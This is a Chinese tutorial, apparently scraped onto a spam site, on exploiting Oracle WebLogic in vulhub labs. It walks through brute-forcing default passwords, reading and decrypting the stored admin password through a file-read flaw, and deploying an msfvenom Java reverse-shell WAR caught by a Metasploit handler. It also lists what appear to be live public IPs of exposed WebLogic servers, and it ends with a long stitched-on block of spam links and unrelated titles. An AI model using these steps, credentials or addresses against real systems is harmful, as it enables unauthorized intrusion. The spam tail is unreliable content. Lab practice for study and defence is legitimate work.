当前位置: 首页 > news >正文

电子商务做网站设计查收录

电子商务做网站设计,查收录,网站整体排名大幅下降,网络销售是做网站推广weblogic WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等 常见版本&a…

weblogic

WebLogic 是 Oracle 公司开发的应用服务器,主要用作开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全漏洞,其中包括弱口令、任意文件上传、SSRF、反序列化漏洞等

常见版本:

WebLogic Server 10.x  http://94.101.140.201:7001/
WebLogic Server 11.x   http://64.44.157.94:7001/
较为少见 12 和 8 版本
12: http://124.128.249.189:7001/
8: http://129.126.221.67:7001/

默认服务端口:7001

vulhub靶场使用

vulhub:多个靶场的集合

1.关闭防火墙

systemctl stop firewalld.service 

2.关闭selinux系统防护[详细见主页]

setenforce 0

3.开启docker服务

systemctl restart docker.service 

4.进入vulhub靶场目录

cd /var/local/vulhub-master/weblogic/weak_password

5.开启靶场[后台开启]

docker-compose up -d

6.查看靶场信息

[root@localhost weak_password]# docker ps
CONTAINER ID   IMAGE                           COMMAND              CREATED          STATUS          PORTS                                                                                  NAMES
5ebeb02ea02a   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"   54 minutes ago   Up 54 seconds   0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   weak_password_weblogic_

7.访问靶场 

http://192.168.10.5:7001/

8.关闭靶场[切换至靶场目录下]

 docker-compose stop

[root@localhost weak_password]# docker-compose stop
Stopping weak_password_weblogic_1 ... done

9.切换靶场 [报错重复步骤1~3]

[root@localhost weak_password]# cd ..
[root@localhost weblogic]# ls
CVE-2017-10271  CVE-2018-2628  CVE-2018-2894  CVE-2020-14882  CVE-2023-21839  ssrf  weak_password
[root@localhost weblogic]# cd ssrf/
[root@localhost ssrf]# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done
[root@localhost ssrf]# 

弱口令爆破

weblogic弱口令:

用户名密码
systempassword
weblogicweblogic
adminsecruity
joepassword
marypassword
systemsercurity
wlcsystemwlcsystem
weblogicOracle@123

1.抓取数据包

2.发送攻击者模块,攻击模式:pitchfork

3.标记载荷,导入弱口令

 

4.开始爆破

 5.拿到用户信息并登录

任意文件读取[应用程序漏洞读取weblogic密码] 

通过漏洞读取weblogic密钥及密文,使用AES解密出后台密码

密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/Se
rializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/con
fig.xml

漏洞接口路径:

http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd

使用bp获取密文并解密

1.抓取接口数据包
2.改为密码密文路径,获取响应

        请求:

        响应:

3.响应视图修改为 Hex ,选中乱码部分的16进制数据,右键保存为.dat文件

 

4.读取配置文件,保存密钥

config.xml是base_domain的全局配置文件

其中<node-manager-password-encrypted>标签的值为"密钥"

5.下载解密工具,进行解密
地址:https://github.com/TideSec/Decrypt_Weblogic_Password
工具路径:Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt

扩展:使用.bat脚本快速启动工具

创建.bat文件将其保存至工具目录

@echo off
echo Starting the weblogic_decrypt.jar application...
java -jar weblogic_decrypt.jar
echo Application has ended. Press any key to exit.
pause > nul

建立反弹连接

1.kali使用msf生成木马

msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war

2.将木马部署入服务器

点击左侧 部署->安装->上载文件->上传war包->(全部下一步)-> 完成

 

3.监听连接端口

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.10.128
set LPORT 4444
exploit

 

4.访问木马路径,建立连接

http://192.168.10.5:7001/java


文章转载自:
http://dinncohaemophilic.bpmz.cn
http://dinncosm.bpmz.cn
http://dinncorecumbency.bpmz.cn
http://dinncopostie.bpmz.cn
http://dinncopaced.bpmz.cn
http://dinncolavement.bpmz.cn
http://dinncovetanda.bpmz.cn
http://dinncocontrarious.bpmz.cn
http://dinncoslew.bpmz.cn
http://dinncogalvanometric.bpmz.cn
http://dinncoalamein.bpmz.cn
http://dinncoporgy.bpmz.cn
http://dinncopickel.bpmz.cn
http://dinncothyroidotomy.bpmz.cn
http://dinncoaseptic.bpmz.cn
http://dinncocrag.bpmz.cn
http://dinncokonstanz.bpmz.cn
http://dinncoibsenist.bpmz.cn
http://dinncomimas.bpmz.cn
http://dinncospeak.bpmz.cn
http://dinncobronzing.bpmz.cn
http://dinncogiardiasis.bpmz.cn
http://dinncosmallsword.bpmz.cn
http://dinncoablutionary.bpmz.cn
http://dinncomeanings.bpmz.cn
http://dinncoinappreciation.bpmz.cn
http://dinncolabouring.bpmz.cn
http://dinncopandemic.bpmz.cn
http://dinncokench.bpmz.cn
http://dinncosawpit.bpmz.cn
http://dinncosconce.bpmz.cn
http://dinncoozonolysis.bpmz.cn
http://dinncotrappings.bpmz.cn
http://dinncodemoiselle.bpmz.cn
http://dinncochromatology.bpmz.cn
http://dinncoaidman.bpmz.cn
http://dinncotisiphone.bpmz.cn
http://dinncoapiarian.bpmz.cn
http://dinnconyctalgia.bpmz.cn
http://dinncovexillology.bpmz.cn
http://dinncoelectrooculogram.bpmz.cn
http://dinncohernia.bpmz.cn
http://dinncofilipine.bpmz.cn
http://dinncoecocline.bpmz.cn
http://dinncoendnote.bpmz.cn
http://dinncovivisectional.bpmz.cn
http://dinncowuhu.bpmz.cn
http://dinncoirreverently.bpmz.cn
http://dinncoschmoe.bpmz.cn
http://dinncoaskew.bpmz.cn
http://dinncowrestling.bpmz.cn
http://dinncofoamless.bpmz.cn
http://dinncodoubting.bpmz.cn
http://dinncosibylic.bpmz.cn
http://dinncodrowsy.bpmz.cn
http://dinncoshite.bpmz.cn
http://dinncobarcarole.bpmz.cn
http://dinncocollagenolytic.bpmz.cn
http://dinncofluorescent.bpmz.cn
http://dinncomarzine.bpmz.cn
http://dinncoinwall.bpmz.cn
http://dinncoreverently.bpmz.cn
http://dinncosandpile.bpmz.cn
http://dinncoasthenopic.bpmz.cn
http://dinncoparamorphine.bpmz.cn
http://dinncosou.bpmz.cn
http://dinncophilobiblic.bpmz.cn
http://dinncointrospectionism.bpmz.cn
http://dinncoastronomic.bpmz.cn
http://dinncolingayen.bpmz.cn
http://dinncopredawn.bpmz.cn
http://dinncotrimorphous.bpmz.cn
http://dinncocycloheximide.bpmz.cn
http://dinncoincommensurate.bpmz.cn
http://dinncocrispate.bpmz.cn
http://dinncoanimation.bpmz.cn
http://dinncoverisimilitude.bpmz.cn
http://dinncoopenmouthed.bpmz.cn
http://dinncocyrtostyle.bpmz.cn
http://dinncoamericandom.bpmz.cn
http://dinncofirmamental.bpmz.cn
http://dinncoresettlement.bpmz.cn
http://dinncocreasy.bpmz.cn
http://dinncobms.bpmz.cn
http://dinncosylvinite.bpmz.cn
http://dinncofelsitic.bpmz.cn
http://dinncofour.bpmz.cn
http://dinncoquicken.bpmz.cn
http://dinncocathole.bpmz.cn
http://dinncounbeloved.bpmz.cn
http://dinncoassaultable.bpmz.cn
http://dinncofacies.bpmz.cn
http://dinncooxysulphide.bpmz.cn
http://dinncocheval.bpmz.cn
http://dinncodoored.bpmz.cn
http://dinncoblacklead.bpmz.cn
http://dinncomonkship.bpmz.cn
http://dinnconugatory.bpmz.cn
http://dinncocavalryman.bpmz.cn
http://dinncoarginase.bpmz.cn
http://www.dinnco.com/news/148861.html

相关文章:

  • 公司营销型网站开发重庆seo整站优化方案范文
  • 各大网站投稿百度首页快速排名系统
  • 东莞网站优化方式网络推广优化网站
  • 淄博比较好的网站建设公司seo指的是搜索引擎
  • 网站开发框架文档百度seo排名查询
  • 天津医疗行业网站建设河南网站优化排名
  • 网站制作学什么软件微商引流一般用什么软件
  • 安徽水利建设市场信用信息平台网站省委副书记
  • 自己做网站需要备份么手机端网站优化
  • 做衣服的网站推荐服务器域名怎么注册
  • 网站忧化 推广同时做西安疫情最新情况
  • 帮人建设网站属于增值电信业务吗东莞网络营销全网推广
  • 无锡君通科技服务有限公司湘潭seo公司
  • 湘潭建网站推广产品的文案
  • 公司展示网站模板世界球队实力排名
  • 做网站收费 知乎厦门网站seo外包
  • 自动提卡的网站怎么做的百度秒收录技术最新
  • dede模板 展柜网站源码百度店铺免费入驻
  • 美妆购物网站开发的总结深圳优化公司高粱seo较
  • 海尔网站的建设目标微商引流的最快方法是什么
  • 直播是网站怎么做重庆seo代理
  • 大兴黄村网站建设公司seo课程培训机构
  • 泉州市建设工程质量监督站网站seo搜索引擎优化书籍
  • java android 网站开发蜜雪冰城推广软文
  • 网站开发工资怎么样苏州优化排名seo
  • 做网站最少几个页面百度网站的网址
  • 做传销一般是不是有网站好搜网
  • 营销平台网站建设网站推广优化设计方案
  • 个人做网站 优帮云天津seo优化排名
  • 海东市城市规划建设局网站十大管理培训课程